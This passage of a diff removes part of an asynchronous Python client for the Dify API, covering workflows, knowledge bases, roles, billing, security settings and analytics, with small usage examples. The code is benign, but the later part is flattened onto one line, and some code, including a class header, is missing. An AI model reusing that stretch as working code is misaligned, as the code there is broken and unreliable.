-        """Update a conversation variable with full response handling."""
-        data = {"value": value, "user": user}
-        url = f"/conversations/{conversation_id}/variables/{variable_id}"
-        return await self._send_request("PUT", url, json=data)
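-
-
-# Illustrative usage sketch (not part of the SDK): a minimal blocking chat call
-# against the chat client defined above. The class name AsyncChatClient is an
-# assumption about the enclosing class; the key and user values are
-# placeholders. Run with asyncio.run(...).
-async def _example_chat_usage() -> None:
-    client = AsyncChatClient(api_key="app-your-api-key")
-    response = await client.create_chat_message(
-        inputs={}, query="Hello!", user="user-123", response_mode="blocking"
-    )
-    print(response.json())  # httpx.Response exposes .json() for parsed bodies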
-
-
-class AsyncWorkflowClient(AsyncDifyClient):
-    """Async client for Workflow API operations."""
-
-    async def run(
-        self,
-        inputs: dict,
-        response_mode: Literal["blocking", "streaming"] = "streaming",
-        user: str = "abc-123",
-    ):
-        """Run a workflow."""
-        data = {"inputs": inputs, "response_mode": response_mode, "user": user}
-        return await self._send_request("POST", "/workflows/run", data)
-
-    async def stop(self, task_id: str, user: str):
-        """Stop a running workflow task."""
-        data = {"user": user}
-        return await self._send_request("POST", f"/workflows/tasks/{task_id}/stop", data)
-
-    async def get_result(self, workflow_run_id: str):
-        """Get workflow run result."""
-        return await self._send_request("GET", f"/workflows/run/{workflow_run_id}")
-
-    async def get_workflow_logs(
-        self,
-        keyword: str | None = None,
-        status: Literal["succeeded", "failed", "stopped"] | None = None,
-        page: int = 1,
-        limit: int = 20,
-        created_at__before: str | None = None,
-        created_at__after: str | None = None,
-        created_by_end_user_session_id: str | None = None,
-        created_by_account: str | None = None,
-    ):
-        """Get workflow execution logs with optional filtering."""
-        params = {
-            "page": page,
-            "limit": limit,
-            "keyword": keyword,
-            "status": status,
-            "created_at__before": created_at__before,
-            "created_at__after": created_at__after,
-            "created_by_end_user_session_id": created_by_end_user_session_id,
-            "created_by_account": created_by_account,
-        }
-        return await self._send_request("GET", "/workflows/logs", params=params)
-
-    async def run_specific_workflow(
-        self,
-        workflow_id: str,
-        inputs: dict,
-        response_mode: Literal["blocking", "streaming"] = "streaming",
-        user: str = "abc-123",
-    ):
-        """Run a specific workflow by workflow ID."""
-        data = {"inputs": inputs, "response_mode": response_mode, "user": user}
-        return await self._send_request(
-            "POST",
-            f"/workflows/{workflow_id}/run",
-            data,
-            stream=(response_mode == "streaming"),
-        )
-
-    # Enhanced Workflow APIs
-    async def get_workflow_draft(self, app_id: str):
-        """Get workflow draft configuration.
-
-        Args:
-            app_id: ID of the workflow app
-
-        Returns:
-            Workflow draft configuration
-        """
-        url = f"/apps/{app_id}/workflow/draft"
-        return await self._send_request("GET", url)
-
-    async def update_workflow_draft(self, app_id: str, workflow_data: Dict[str, Any]):
-        """Update workflow draft configuration.
-
-        Args:
-            app_id: ID of the workflow app
-            workflow_data: Workflow configuration data
-
-        Returns:
-            Updated workflow draft
-        """
-        url = f"/apps/{app_id}/workflow/draft"
-        return await self._send_request("PUT", url, json=workflow_data)
-
-    async def publish_workflow(self, app_id: str):
-        """Publish workflow from draft.
-
-        Args:
-            app_id: ID of the workflow app
-
-        Returns:
-            Published workflow information
-        """
-        url = f"/apps/{app_id}/workflow/publish"
-        return await self._send_request("POST", url)
-
-    async def get_workflow_run_history(
-        self,
-        app_id: str,
-        page: int = 1,
-        limit: int = 20,
-        status: Literal["succeeded", "failed", "stopped"] | None = None,
-    ):
-        """Get workflow run history.
-
-        Args:
-            app_id: ID of the workflow app
-            page: Page number (default: 1)
-            limit: Number of items per page (default: 20)
-            status: Filter by status (optional)
-
-        Returns:
-            Paginated workflow run history
-        """
-        params = {"page": page, "limit": limit}
-        if status:
-            params["status"] = status
-        url = f"/apps/{app_id}/workflow/runs"
-        return await self._send_request("GET", url, params=params)
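-
-
-# Illustrative sketch (hypothetical values): running a workflow in blocking
-# mode, then fetching the finished run. The "workflow_run_id" response field is
-# an assumption about the payload shape. Run with asyncio.run(...).
-async def _example_workflow_usage() -> None:
-    client = AsyncWorkflowClient(api_key="app-your-api-key")
-    response = await client.run(inputs={"topic": "demo"}, response_mode="blocking", user="user-123")
-    run_id = response.json().get("workflow_run_id")
-    if run_id:
-        result = await client.get_result(run_id)
-        print(result.json())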
-
-
-class AsyncWorkspaceClient(AsyncDifyClient):
-    """Async client for workspace-related operations."""
-
-    async def get_available_models(self, model_type: str):
-        """Get available models by model type."""
-        url = f"/workspaces/current/models/model-types/{model_type}"
-        return await self._send_request("GET", url)
-
-    async def get_available_models_by_type(self, model_type: str):
-        """Get available models by model type (enhanced version)."""
-        url = f"/workspaces/current/models/model-types/{model_type}"
-        return await self._send_request("GET", url)
-
-    async def get_model_providers(self):
-        """Get all model providers."""
-        return await self._send_request("GET", "/workspaces/current/model-providers")
-
-    async def get_model_provider_models(self, provider_name: str):
-        """Get models for a specific provider."""
-        url = f"/workspaces/current/model-providers/{provider_name}/models"
-        return await self._send_request("GET", url)
-
-    async def validate_model_provider_credentials(self, provider_name: str, credentials: Dict[str, Any]):
-        """Validate model provider credentials."""
-        url = f"/workspaces/current/model-providers/{provider_name}/credentials/validate"
-        return await self._send_request("POST", url, json=credentials)
-
-    # File Management APIs
-    async def get_file_info(self, file_id: str):
-        """Get information about a specific file."""
-        url = f"/files/{file_id}/info"
-        return await self._send_request("GET", url)
-
-    async def get_file_download_url(self, file_id: str):
-        """Get download URL for a file."""
-        url = f"/files/{file_id}/download-url"
-        return await self._send_request("GET", url)
-
-    async def delete_file(self, file_id: str):
-        """Delete a file."""
-        url = f"/files/{file_id}"
-        return await self._send_request("DELETE", url)
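-
-
-# Illustrative sketch: listing providers and LLM-type models via the workspace
-# client above. "llm" is one plausible model_type value, not a documented list.
-async def _example_workspace_usage() -> None:
-    client = AsyncWorkspaceClient(api_key="app-your-api-key")
-    providers = await client.get_model_providers()
-    models = await client.get_available_models("llm")
-    print(providers.json(), models.json())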
-
-
-class AsyncKnowledgeBaseClient(AsyncDifyClient):
-    """Async client for Knowledge Base API operations."""
-
-    def __init__(
-        self,
-        api_key: str,
-        base_url: str = "https://api.dify.ai/v1",
-        dataset_id: str | None = None,
-        timeout: float = 60.0,
-    ):
-        """Construct an AsyncKnowledgeBaseClient object.
-
-        Args:
-            api_key: API key of Dify
-            base_url: Base URL of Dify API
-            dataset_id: ID of the dataset
-            timeout: Request timeout in seconds
-        """
-        super().__init__(api_key=api_key, base_url=base_url, timeout=timeout)
-        self.dataset_id = dataset_id
-
-    def _get_dataset_id(self):
-        """Get the dataset ID, raise error if not set."""
-        if self.dataset_id is None:
-            raise ValueError("dataset_id is not set")
-        return self.dataset_id
-
-    async def create_dataset(self, name: str, **kwargs):
-        """Create a new dataset."""
-        return await self._send_request("POST", "/datasets", {"name": name}, **kwargs)
-
-    async def list_datasets(self, page: int = 1, page_size: int = 20, **kwargs):
-        """List all datasets."""
-        return await self._send_request("GET", "/datasets", params={"page": page, "limit": page_size}, **kwargs)
-
-    async def create_document_by_text(self, name: str, text: str, extra_params: Dict | None = None, **kwargs):
-        """Create a document by text.
-
-        Args:
-            name: Name of the document
-            text: Text content of the document
-            extra_params: Extra parameters for the API
-
-        Returns:
-            Response from the API
-        """
-        data = {
-            "indexing_technique": "high_quality",
-            "process_rule": {"mode": "automatic"},
-            "name": name,
-            "text": text,
-        }
-        if extra_params is not None and isinstance(extra_params, dict):
-            data.update(extra_params)
-        url = f"/datasets/{self._get_dataset_id()}/document/create_by_text"
-        return await self._send_request("POST", url, json=data, **kwargs)
-
-    async def update_document_by_text(
-        self,
-        document_id: str,
-        name: str,
-        text: str,
-        extra_params: Dict | None = None,
-        **kwargs,
-    ):
-        """Update a document by text."""
-        data = {"name": name, "text": text}
-        if extra_params is not None and isinstance(extra_params, dict):
-            data.update(extra_params)
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_text"
-        return await self._send_request("POST", url, json=data, **kwargs)
-
-    async def create_document_by_file(
-        self,
-        file_path: str,
-        original_document_id: str | None = None,
-        extra_params: Dict | None = None,
-    ):
-        """Create a document by file."""
-        # Read the file contents up front; the multipart sender expects bytes,
-        # not an async file handle.
-        async with aiofiles.open(file_path, "rb") as f:
-            content = await f.read()
-        files = {"file": (os.path.basename(file_path), content)}
-        data = {
-            "process_rule": {"mode": "automatic"},
-            "indexing_technique": "high_quality",
-        }
-        if extra_params is not None and isinstance(extra_params, dict):
-            data.update(extra_params)
-        if original_document_id is not None:
-            data["original_document_id"] = original_document_id
-        url = f"/datasets/{self._get_dataset_id()}/document/create_by_file"
-        return await self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files)
-
-    async def update_document_by_file(self, document_id: str, file_path: str, extra_params: Dict | None = None):
-        """Update a document by file."""
-        async with aiofiles.open(file_path, "rb") as f:
-            content = await f.read()
-        files = {"file": (os.path.basename(file_path), content)}
-        data = {}
-        if extra_params is not None and isinstance(extra_params, dict):
-            data.update(extra_params)
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/update_by_file"
-        return await self._send_request_with_files("POST", url, {"data": json.dumps(data)}, files)
-
-    async def batch_indexing_status(self, batch_id: str, **kwargs):
-        """Get the status of the batch indexing."""
-        url = f"/datasets/{self._get_dataset_id()}/documents/{batch_id}/indexing-status"
-        return await self._send_request("GET", url, **kwargs)
-
-    async def delete_dataset(self):
-        """Delete this dataset."""
-        url = f"/datasets/{self._get_dataset_id()}"
-        return await self._send_request("DELETE", url)
-
-    async def delete_document(self, document_id: str):
-        """Delete a document."""
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}"
-        return await self._send_request("DELETE", url)
-
-    async def list_documents(
-        self,
-        page: int | None = None,
-        page_size: int | None = None,
-        keyword: str | None = None,
-        **kwargs,
-    ):
-        """Get a list of documents in this dataset."""
-        params = {
-            "page": page,
-            "limit": page_size,
-            "keyword": keyword,
-        }
-        url = f"/datasets/{self._get_dataset_id()}/documents"
-        return await self._send_request("GET", url, params=params, **kwargs)
-
-    async def add_segments(self, document_id: str, segments: list[dict], **kwargs):
-        """Add segments to a document."""
-        data = {"segments": segments}
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments"
-        return await self._send_request("POST", url, json=data, **kwargs)
-
-    async def query_segments(
-        self,
-        document_id: str,
-        keyword: str | None = None,
-        status: str | None = None,
-        **kwargs,
-    ):
-        """Query segments in this document.
-
-        Args:
-            document_id: ID of the document
-            keyword: Query keyword (optional)
-            status: Status of the segment (optional, e.g., 'completed')
-            **kwargs: Additional parameters to pass to the API.
-                Can include a 'params' dict for extra query parameters.
-
-        Returns:
-            Response from the API
-        """
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments"
-        params = {
-            "keyword": keyword,
-            "status": status,
-        }
-        if "params" in kwargs:
-            params.update(kwargs.pop("params"))
-        return await self._send_request("GET", url, params=params, **kwargs)
-
-    async def delete_document_segment(self, document_id: str, segment_id: str):
-        """Delete a segment from a document."""
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}"
-        return await self._send_request("DELETE", url)
-
-    async def update_document_segment(self, document_id: str, segment_id: str, segment_data: dict, **kwargs):
-        """Update a segment in a document."""
-        data = {"segment": segment_data}
-        url = f"/datasets/{self._get_dataset_id()}/documents/{document_id}/segments/{segment_id}"
-        return await self._send_request("POST", url, json=data, **kwargs)
-
-    # Advanced Knowledge Base APIs
-    async def hit_testing(
-        self,
-        query: str,
-        retrieval_model: Dict[str, Any] | None = None,
-        external_retrieval_model: Dict[str, Any] | None = None,
-    ):
-        """Perform hit testing on the dataset."""
-        data = {"query": query}
-        if retrieval_model:
-            data["retrieval_model"] = retrieval_model
-        if external_retrieval_model:
-            data["external_retrieval_model"] = external_retrieval_model
-        url = f"/datasets/{self._get_dataset_id()}/hit-testing"
-        return await self._send_request("POST", url, json=data)
-
-    async def get_dataset_metadata(self):
-        """Get dataset metadata."""
-        url = f"/datasets/{self._get_dataset_id()}/metadata"
-        return await self._send_request("GET", url)
-
-    async def create_dataset_metadata(self, metadata_data: Dict[str, Any]):
-        """Create dataset metadata."""
-        url = f"/datasets/{self._get_dataset_id()}/metadata"
-        return await self._send_request("POST", url, json=metadata_data)
-
-    async def update_dataset_metadata(self, metadata_id: str, metadata_data: Dict[str, Any]):
-        """Update dataset metadata."""
-        url = f"/datasets/{self._get_dataset_id()}/metadata/{metadata_id}"
-        return await self._send_request("PATCH", url, json=metadata_data)
-
-    async def get_built_in_metadata(self):
-        """Get built-in metadata."""
-        url = f"/datasets/{self._get_dataset_id()}/metadata/built-in"
-        return await self._send_request("GET", url)
-
-    async def manage_built_in_metadata(self, action: str, metadata_data: Dict[str, Any] | None = None):
-        """Manage built-in metadata with specified action."""
-        data = metadata_data or {}
-        url = f"/datasets/{self._get_dataset_id()}/metadata/built-in/{action}"
-        return await self._send_request("POST", url, json=data)
-
-    async def update_documents_metadata(self, operation_data: List[Dict[str, Any]]):
-        """Update metadata for multiple documents."""
-        url = f"/datasets/{self._get_dataset_id()}/documents/metadata"
-        data = {"operation_data": operation_data}
-        return await self._send_request("POST", url, json=data)
-
-    # Dataset Tags APIs
-    async def list_dataset_tags(self):
-        """List all dataset tags."""
-        return await self._send_request("GET", "/datasets/tags")
-
-    async def bind_dataset_tags(self, tag_ids: List[str]):
-        """Bind tags to dataset."""
-        data = {"tag_ids": tag_ids, "target_id": self._get_dataset_id()}
-        return await self._send_request("POST", "/datasets/tags/binding", json=data)
-
-    async def unbind_dataset_tag(self, tag_id: str):
-        """Unbind a single tag from dataset."""
-        data = {"tag_id": tag_id, "target_id": self._get_dataset_id()}
-        return await self._send_request("POST", "/datasets/tags/unbinding", json=data)
-
-    async def get_dataset_tags(self):
-        """Get tags for current dataset."""
-        url = f"/datasets/{self._get_dataset_id()}/tags"
-        return await self._send_request("GET", url)
-
-    # RAG Pipeline APIs
-    async def get_datasource_plugins(self, is_published: bool = True):
-        """Get datasource plugins for RAG pipeline."""
-        params = {"is_published": is_published}
-        url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource-plugins"
-        return await self._send_request("GET", url, params=params)
-
-    async def run_datasource_node(
-        self,
-        node_id: str,
-        inputs: Dict[str, Any],
-        datasource_type: str,
-        is_published: bool = True,
-        credential_id: str | None = None,
-    ):
-        """Run a datasource node in RAG pipeline."""
-        data = {
-            "inputs": inputs,
-            "datasource_type": datasource_type,
-            "is_published": is_published,
-        }
-        if credential_id:
-            data["credential_id"] = credential_id
-        url = f"/datasets/{self._get_dataset_id()}/pipeline/datasource/nodes/{node_id}/run"
-        return await self._send_request("POST", url, json=data, stream=True)
-
-    async def run_rag_pipeline(
-        self,
-        inputs: Dict[str, Any],
-        datasource_type: str,
-        datasource_info_list: List[Dict[str, Any]],
-        start_node_id: str,
-        is_published: bool = True,
-        response_mode: Literal["streaming", "blocking"] = "blocking",
-    ):
-        """Run RAG pipeline."""
-        data = {
-            "inputs": inputs,
-            "datasource_type": datasource_type,
-            "datasource_info_list": datasource_info_list,
-            "start_node_id": start_node_id,
-            "is_published": is_published,
-            "response_mode": response_mode,
-        }
-        url = f"/datasets/{self._get_dataset_id()}/pipeline/run"
-        return await self._send_request("POST", url, json=data, stream=(response_mode == "streaming"))
-
-    async def upload_pipeline_file(self, file_path: str):
-        """Upload file for RAG pipeline."""
-        # Read the file contents up front; the multipart sender expects bytes,
-        # not an async file handle.
-        async with aiofiles.open(file_path, "rb") as f:
-            content = await f.read()
-        files = {"file": (os.path.basename(file_path), content)}
-        return await self._send_request_with_files("POST", "/datasets/pipeline/file-upload", {}, files)
-
-    # Dataset Management APIs
-    async def get_dataset(self, dataset_id: str | None = None):
-        """Get detailed information about a specific dataset."""
-        ds_id = dataset_id or self._get_dataset_id()
-        url = f"/datasets/{ds_id}"
-        return await self._send_request("GET", url)
-
-    async def update_dataset(
-        self,
-        dataset_id: str | None = None,
-        name: str | None = None,
-        description: str | None = None,
-        indexing_technique: str | None = None,
-        embedding_model: str | None = None,
-        embedding_model_provider: str | None = None,
-        retrieval_model: Dict[str, Any] | None = None,
-        **kwargs,
-    ):
-        """Update dataset configuration.
-
-        Args:
-            dataset_id: Dataset ID (optional, uses current dataset_id if not provided)
-            name: New dataset name
-            description: New dataset description
-            indexing_technique: Indexing technique ('high_quality' or 'economy')
-            embedding_model: Embedding model name
-            embedding_model_provider: Embedding model provider
-            retrieval_model: Retrieval model configuration dict
-            **kwargs: Additional parameters to pass to the API
-
-        Returns:
-            Response from the API with updated dataset information
-        """
-        ds_id = dataset_id or self._get_dataset_id()
-        url = f"/datasets/{ds_id}"
-
-        payload = {
-            "name": name,
-            "description": description,
-            "indexing_technique": indexing_technique,
-            "embedding_model": embedding_model,
-            "embedding_model_provider": embedding_model_provider,
-            "retrieval_model": retrieval_model,
-        }
-
-        data = {k: v for k, v in payload.items() if v is not None}
-        data.update(kwargs)
-
-        return await self._send_request("PATCH", url, json=data)
-
-    async def batch_update_document_status(
-        self,
-        action: Literal["enable", "disable", "archive", "un_archive"],
-        document_ids: List[str],
-        dataset_id: str | None = None,
-    ):
-        """Batch update document status."""
-        ds_id = dataset_id or self._get_dataset_id()
-        url = f"/datasets/{ds_id}/documents/status/{action}"
-        data = {"document_ids": document_ids}
-        return await self._send_request("PATCH", url, json=data)
-
-    # Enhanced Dataset APIs
-
-    async def create_dataset_from_template(self, template_name: str, name: str, description: str | None = None):
-        """Create a dataset from a predefined template.
-
-        Args:
-            template_name: Name of the template to use
-            name: Name for the new dataset
-            description: Description for the dataset (optional)
-
-        Returns:
-            Created dataset information
-        """
-        data = {
-            "template_name": template_name,
-            "name": name,
-            "description": description,
-        }
-        return await self._send_request("POST", "/datasets/from-template", json=data)
-
-    async def duplicate_dataset(self, dataset_id: str, name: str):
-        """Duplicate an existing dataset.
-
-        Args:
-            dataset_id: ID of dataset to duplicate
-            name: Name for duplicated dataset
-
-        Returns:
-            New dataset information
-        """
-        data = {"name": name}
-        url = f"/datasets/{dataset_id}/duplicate"
-        return await self._send_request("POST", url, json=data)
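-
-
-# Illustrative sketch: creating a dataset, then indexing a text document into
-# it. Assumes the create_dataset response body carries the new dataset's "id";
-# the key and names are placeholders.
-async def _example_knowledge_base_usage() -> None:
-    client = AsyncKnowledgeBaseClient(api_key="dataset-your-api-key")
-    created = await client.create_dataset("demo-dataset")
-    client.dataset_id = created.json()["id"]
-    await client.create_document_by_text("readme", "Hello, Dify!")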
return await self._send_request("GET", url) - - async def update_role(self, role_id: str, role_data: Dict[str, Any]): - """Update role information.""" - url = f"/roles/{role_id}" - return await self._send_request("PUT", url, json=role_data) - - async def delete_role(self, role_id: str): - """Delete a role.""" - url = f"/roles/{role_id}" - return await self._send_request("DELETE", url) - - # Permission Management APIs - async def list_permissions(self): - """List all available permissions.""" - return await self._send_request("GET", "/permissions") - - async def get_role_permissions(self, role_id: str): - """Get permissions for a specific role.""" - url = f"/roles/{role_id}/permissions" - return await self._send_request("GET", url) - - async def update_role_permissions(self, role_id: str, permissions: List[str]): - """Update permissions for a role.""" - url = f"/roles/{role_id}/permissions" - data = {"permissions": permissions} - return await self._send_request("PUT", url, json=data) - - # Workspace Settings APIs - async def get_workspace_settings(self): - """Get workspace settings and configuration.""" - return await self._send_request("GET", "/workspace/settings") - - async def update_workspace_settings(self, settings_data: Dict[str, Any]): - """Update workspace settings.""" - return await self._send_request("PUT", "/workspace/settings", json=settings_data) - - async def get_workspace_statistics(self): - """Get workspace usage statistics.""" - return await self._send_request("GET", "/workspace/statistics") - - # Billing and Subscription APIs - async def get_billing_info(self): - """Get current billing information.""" - return await self._send_request("GET", "/billing") - - async def get_subscription_info(self): - """Get current subscription information.""" - return await self._send_request("GET", "/subscription") - - async def update_subscription(self, subscription_data: Dict[str, Any]): - """Update subscription settings.""" - return await self._send_request("PUT", "/subscription", json=subscription_data) - - async def get_billing_history(self, page: int = 1, limit: int = 20): - """Get billing history with pagination.""" - params = {"page": page, "limit": limit} - return await self._send_request("GET", "/billing/history", params=params) - - async def get_usage_metrics(self, start_date: str, end_date: str, metric_type: str | None = None): - """Get usage metrics for a date range.""" - params = {"start_date": start_date, "end_date": end_date} - if metric_type: - params["metric_type"] = metric_type - return await self._send_request("GET", "/usage/metrics", params=params) - - # Audit Logs APIs - async def get_audit_logs( - self, - page: int = 1, - limit: int = 20, - action: str | None = None, - user_id: str | None = None, - start_date: str | None = None, - end_date: str | None = None, - ): - """Get audit logs with filtering options.""" - params = {"page": page, "limit": limit} - if action: - params["action"] = action - if user_id: - params["user_id"] = user_id - if start_date: - params["start_date"] = start_date - if end_date: - params["end_date"] = end_date - return await self._send_request("GET", "/audit/logs", params=params) - - async def export_audit_logs(self, format: str = "csv", filters: Dict[str, Any] | None = None): - """Export audit logs in specified format.""" - params = {"format": format} - if filters: - params.update(filters) - return await self._send_request("GET", "/audit/logs/export", params=params) - - -class AsyncSecurityClient(AsyncDifyClient): - """Async Security and Access 
-
-
-class AsyncSecurityClient(AsyncDifyClient):
-    """Async Security and Access Control APIs for Dify platform security management."""
-
-    # API Key Management APIs
-    async def list_api_keys(self, page: int = 1, limit: int = 20, status: str | None = None):
-        """List all API keys with pagination and filtering."""
-        params = {"page": page, "limit": limit}
-        if status:
-            params["status"] = status
-        return await self._send_request("GET", "/security/api-keys", params=params)
-
-    async def create_api_key(
-        self,
-        name: str,
-        permissions: List[str],
-        expires_at: str | None = None,
-        description: str | None = None,
-    ):
-        """Create a new API key with specified permissions."""
-        data = {"name": name, "permissions": permissions}
-        if expires_at:
-            data["expires_at"] = expires_at
-        if description:
-            data["description"] = description
-        return await self._send_request("POST", "/security/api-keys", json=data)
-
-    async def get_api_key(self, key_id: str):
-        """Get detailed information about an API key."""
-        url = f"/security/api-keys/{key_id}"
-        return await self._send_request("GET", url)
-
-    async def update_api_key(self, key_id: str, key_data: Dict[str, Any]):
-        """Update API key information."""
-        url = f"/security/api-keys/{key_id}"
-        return await self._send_request("PUT", url, json=key_data)
-
-    async def revoke_api_key(self, key_id: str):
-        """Revoke an API key."""
-        url = f"/security/api-keys/{key_id}/revoke"
-        return await self._send_request("POST", url)
-
-    async def rotate_api_key(self, key_id: str):
-        """Rotate an API key (generate new key)."""
-        url = f"/security/api-keys/{key_id}/rotate"
-        return await self._send_request("POST", url)
-
-    # Rate Limiting APIs
-    async def get_rate_limits(self):
-        """Get current rate limiting configuration."""
-        return await self._send_request("GET", "/security/rate-limits")
-
-    async def update_rate_limits(self, limits_config: Dict[str, Any]):
-        """Update rate limiting configuration."""
-        return await self._send_request("PUT", "/security/rate-limits", json=limits_config)
-
-    async def get_rate_limit_usage(self, timeframe: str = "1h"):
-        """Get rate limit usage statistics."""
-        params = {"timeframe": timeframe}
-        return await self._send_request("GET", "/security/rate-limits/usage", params=params)
-
-    # Access Control Lists APIs
-    async def list_access_policies(self, page: int = 1, limit: int = 20):
-        """List access control policies."""
-        params = {"page": page, "limit": limit}
-        return await self._send_request("GET", "/security/access-policies", params=params)
-
-    async def create_access_policy(self, policy_data: Dict[str, Any]):
-        """Create a new access control policy."""
-        return await self._send_request("POST", "/security/access-policies", json=policy_data)
-
-    async def get_access_policy(self, policy_id: str):
-        """Get detailed information about an access policy."""
-        url = f"/security/access-policies/{policy_id}"
-        return await self._send_request("GET", url)
-
-    async def update_access_policy(self, policy_id: str, policy_data: Dict[str, Any]):
-        """Update an access control policy."""
-        url = f"/security/access-policies/{policy_id}"
-        return await self._send_request("PUT", url, json=policy_data)
-
-    async def delete_access_policy(self, policy_id: str):
-        """Delete an access control policy."""
-        url = f"/security/access-policies/{policy_id}"
-        return await self._send_request("DELETE", url)
-
-    # Security Settings APIs
-    async def get_security_settings(self):
-        """Get security configuration settings."""
-        return await self._send_request("GET", "/security/settings")
-
-    async def update_security_settings(self, settings_data: Dict[str, Any]):
-        """Update security configuration settings."""
-        return await self._send_request("PUT", "/security/settings", json=settings_data)
-
-    async def get_security_audit_logs(
-        self,
-        page: int = 1,
-        limit: int = 20,
-        event_type: str | None = None,
-        start_date: str | None = None,
-        end_date: str | None = None,
-    ):
-        """Get security-specific audit logs."""
-        params = {"page": page, "limit": limit}
-        if event_type:
-            params["event_type"] = event_type
-        if start_date:
-            params["start_date"] = start_date
-        if end_date:
-            params["end_date"] = end_date
-        return await self._send_request("GET", "/security/audit-logs", params=params)
-
-    # IP Whitelist/Blacklist APIs
-    async def get_ip_whitelist(self):
-        """Get IP whitelist configuration."""
-        return await self._send_request("GET", "/security/ip-whitelist")
-
-    async def update_ip_whitelist(self, ip_list: List[str], description: str | None = None):
-        """Update IP whitelist configuration."""
-        data = {"ip_list": ip_list}
-        if description:
-            data["description"] = description
-        return await self._send_request("PUT", "/security/ip-whitelist", json=data)
-
-    async def get_ip_blacklist(self):
-        """Get IP blacklist configuration."""
-        return await self._send_request("GET", "/security/ip-blacklist")
-
-    async def update_ip_blacklist(self, ip_list: List[str], description: str | None = None):
-        """Update IP blacklist configuration."""
-        data = {"ip_list": ip_list}
-        if description:
-            data["description"] = description
-        return await self._send_request("PUT", "/security/ip-blacklist", json=data)
-
-    # Authentication Settings APIs
-    async def get_auth_settings(self):
-        """Get authentication configuration settings."""
-        return await self._send_request("GET", "/security/auth-settings")
-
-    async def update_auth_settings(self, auth_data: Dict[str, Any]):
-        """Update authentication configuration settings."""
-        return await self._send_request("PUT", "/security/auth-settings", json=auth_data)
-
-    async def test_auth_configuration(self, auth_config: Dict[str, Any]):
-        """Test authentication configuration."""
-        return await self._send_request("POST", "/security/auth-settings/test", json=auth_config)
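-
-
-# Illustrative sketch: issuing a scoped API key with the security client
-# above. The permission names are placeholders, not a documented list.
-async def _example_security_usage() -> None:
-    client = AsyncSecurityClient(api_key="app-your-api-key")
-    key = await client.create_api_key(
-        name="ci-read-only",
-        permissions=["apps:read"],
-        description="Read-only key for CI checks",
-    )
-    print(key.json())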
-
-
-class AsyncAnalyticsClient(AsyncDifyClient):
-    """Async Analytics and Monitoring APIs for Dify platform insights and metrics."""
-
-    # Usage Analytics APIs
-    async def get_usage_analytics(
-        self,
-        start_date: str,
-        end_date: str,
-        granularity: str = "day",
-        metrics: List[str] | None = None,
-    ):
-        """Get usage analytics for specified date range."""
-        params = {
-            "start_date": start_date,
-            "end_date": end_date,
-            "granularity": granularity,
-        }
-        if metrics:
-            params["metrics"] = ",".join(metrics)
-        return await self._send_request("GET", "/analytics/usage", params=params)
-
-    async def get_app_usage_analytics(self, app_id: str, start_date: str, end_date: str, granularity: str = "day"):
-        """Get usage analytics for a specific app."""
-        params = {
-            "start_date": start_date,
-            "end_date": end_date,
-            "granularity": granularity,
-        }
-        url = f"/analytics/apps/{app_id}/usage"
-        return await self._send_request("GET", url, params=params)
-
-    async def get_user_analytics(self, start_date: str, end_date: str, user_segment: str | None = None):
-        """Get user analytics and behavior insights."""
-        params = {"start_date": start_date, "end_date": end_date}
-        if user_segment:
-            params["user_segment"] = user_segment
-        return await self._send_request("GET", "/analytics/users", params=params)
-
-    # Performance Metrics APIs
-    async def get_performance_metrics(self, start_date: str, end_date: str, metric_type: str | None = None):
-        """Get performance metrics for the platform."""
-        params = {"start_date": start_date, "end_date": end_date}
-        if metric_type:
-            params["metric_type"] = metric_type
-        return await self._send_request("GET", "/analytics/performance", params=params)
-
-    async def get_app_performance_metrics(self, app_id: str, start_date: str, end_date: str):
-        """Get performance metrics for a specific app."""
-        params = {"start_date": start_date, "end_date": end_date}
-        url = f"/analytics/apps/{app_id}/performance"
-        return await self._send_request("GET", url, params=params)
-
-    async def get_model_performance_metrics(self, model_provider: str, model_name: str, start_date: str, end_date: str):
-        """Get performance metrics for a specific model."""
-        params = {"start_date": start_date, "end_date": end_date}
-        url = f"/analytics/models/{model_provider}/{model_name}/performance"
-        return await self._send_request("GET", url, params=params)
-
-    # Cost Tracking APIs
-    async def get_cost_analytics(self, start_date: str, end_date: str, cost_type: str | None = None):
-        """Get cost analytics and breakdown."""
-        params = {"start_date": start_date, "end_date": end_date}
-        if cost_type:
-            params["cost_type"] = cost_type
-        return await self._send_request("GET", "/analytics/costs", params=params)
-
-    async def get_app_cost_analytics(self, app_id: str, start_date: str, end_date: str):
-        """Get cost analytics for a specific app."""
-        params = {"start_date": start_date, "end_date": end_date}
-        url = f"/analytics/apps/{app_id}/costs"
-        return await self._send_request("GET", url, params=params)
-
-    async def get_cost_forecast(self, forecast_period: str = "30d"):
-        """Get cost forecast for specified period."""
-        params = {"forecast_period": forecast_period}
-        return await self._send_request("GET", "/analytics/costs/forecast", params=params)
-
-    # Real-time Monitoring APIs
-    async def get_real_time_metrics(self):
-        """Get real-time platform metrics."""
-        return await self._send_request("GET", "/analytics/realtime")
-
-    async def get_app_real_time_metrics(self, app_id: str):
-        """Get real-time metrics for a specific app."""
-        url = f"/analytics/apps/{app_id}/realtime"
-        return await self._send_request("GET", url)
-
-    async def get_system_health(self):
-        """Get overall system health status."""
-        return await self._send_request("GET", "/analytics/health")
-
-    # Custom Reports APIs
-    async def create_custom_report(self, report_config: Dict[str, Any]):
-        """Create a custom analytics report."""
-        return await self._send_request("POST", "/analytics/reports", json=report_config)
-
-    async def list_custom_reports(self, page: int = 1, limit: int = 20):
-        """List custom analytics reports."""
-        params = {"page": page, "limit": limit}
-        return await self._send_request("GET", "/analytics/reports", params=params)
-
-    async def get_custom_report(self, report_id: str):
-        """Get a specific custom report."""
-        url = f"/analytics/reports/{report_id}"
-        return await self._send_request("GET", url)
-
-    async def update_custom_report(self, report_id: str, report_config: Dict[str, Any]):
-        """Update a custom analytics report."""
-        url = f"/analytics/reports/{report_id}"
-        return await self._send_request("PUT", url, json=report_config)
-
-    async def delete_custom_report(self, report_id: str):
-        """Delete a custom analytics report."""
-        url = f"/analytics/reports/{report_id}"
-        return await self._send_request("DELETE", url)
